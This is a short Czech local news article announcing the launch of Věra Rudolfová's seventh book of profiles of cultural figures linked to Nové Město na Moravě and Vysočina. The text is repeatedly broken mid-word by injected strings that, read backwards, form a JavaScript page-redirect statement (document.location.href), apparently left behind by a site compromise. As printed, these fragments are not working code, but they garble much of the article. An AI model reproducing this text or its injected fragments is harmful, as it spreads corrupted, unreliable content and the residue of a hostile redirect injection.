Rainbow page separator

Zajímavé osobnosti Vysočiny přibližuje sedmá kniha medailonků

Neděle, 14. listopadu 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V pořadí už sedmá publikace zaměřená na významné osobnosti kulturního života Vysočiny au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torky Věry Rudolfové s názvem Kraj návratů a poznávání bude v neděli 21. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v 15 hodin pokřtěna v podkroví novoměstské Horácké galerie. Kniha se věnuje životním osudům zajímavých osobností Novoměstska a jejich vztahu k Vysočině.
Nová publikace, jež navázala na spisovatelčiných předchozích šest knih s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tematikou, obsahuje opět vzpomínky na další zhruba dvě desítky osobností; některé z nich i méně známé či téměř zapomenuté. Vesměs ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lidé měli úzký osobní vztah k Novému Městu, ať už [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byli tamní rodáci, nějakou dobu ve městě prožili, anebo na Novoměstsko přijížděli z Prahy či dalších míst coby do oblíbené rekreační destinace. I nadále však platí, že Vysočina je stále nepřebernou studnicí tipů na zajímavé umělce, ať už již zesnulé, či žijící a tvořící, kteří nějakým způsobem ovlivnili kulturní dění v regionu.